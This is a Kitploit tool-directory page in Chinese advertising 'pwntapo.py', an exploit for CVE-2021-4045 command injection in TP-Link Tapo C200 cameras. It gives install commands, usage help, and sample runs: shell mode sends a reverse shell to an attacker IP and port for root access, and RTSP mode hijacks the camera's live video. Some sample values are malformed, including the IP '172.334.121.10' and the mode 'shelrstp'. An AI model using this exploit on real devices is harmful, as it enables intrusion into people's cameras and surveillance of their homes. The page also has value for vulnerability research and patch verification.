Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-4045 — 🔐 "PWNTAPO: 揭示 TP-Link Tapo C200 摄像头中的命令注入 (<= v1.1.16 Build 211209)" 🔓 | Kitploit
工具/GitHubGitHub/0xbinder/cve-2021-4045
物联网安全漏洞分析漏洞利用命令与控制硬件与物联网安全远程访问工具
GitHub0xbinder/cve-2021-4045

CVE-2021-4045

🔐 "PWNTAPO: 揭示 TP-Link Tapo C200 摄像头中的命令注入 (<= v1.1.16 Build 211209)" 🔓

查看仓库
922年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TP-Link Tapo c200 1.1.15 - 远程代码执行 (RCE) (CVE-2021-4045)

🔐 "PWNTAPO:揭示 TP-Link Tapo C200 摄像头(<= v1.1.16 Build 211209)中的命令注入漏洞" 🔓

从 exploit db 阅读关于该利用的说明

这是一个命令注入漏洞,影响所有固件版本低于 1.1.16 Build 211209 Rel. 37726N 的 TP-Link Tapo c200 摄像头。要了解更多关于该利用的工作原理,请阅读 hacefresko 上的这篇文章。

安装

root@kitploit:~
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h

使用方法

root@kitploit:~
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: 揭示 TP-Link Tapo C200 摄像头(<= v1.1.16 Build 211209)中的命令注入漏洞

options:
  -h, --help  显示此帮助信息并退出
  -M M        攻击模式:shell | rtsp(默认:无)
  -U U        RTSP_USER(默认:无)
  -P P        RTSP_PASSWORD(默认:无)
  -C C        RTSP_CIPHERTEXT(默认:无)
  -H H        受害者 IP 地址(默认:无)
  -A A        攻击者 IP 地址(默认:无)
  -p P        监听端口(默认:无)
  -v          增加输出详细程度(默认:False)

该利用有两个模式:SHELL 和 RTSP。

SHELL 模式

在 shell 模式下,只需提供受害者 IP、攻击者 IP 和监听端口,即可在设备上获得一个 root shell。

root@kitploit:~
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] 在端口 1887 上监听...
[+] 向 192.168.110.121 发送反弹 shell...

Listening on 0.0.0.0 1887

RTSP 模式

在 RTSP 模式下,你需要提供 RTSP_USER、PASSWORD 和 CIPHERTEXT,以便获取摄像头的实时画面。

root@kitploit:~
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] 正在设置 RTSP 视频流...

注意:未经用户许可,请勿在设备上运行此工具

下载工具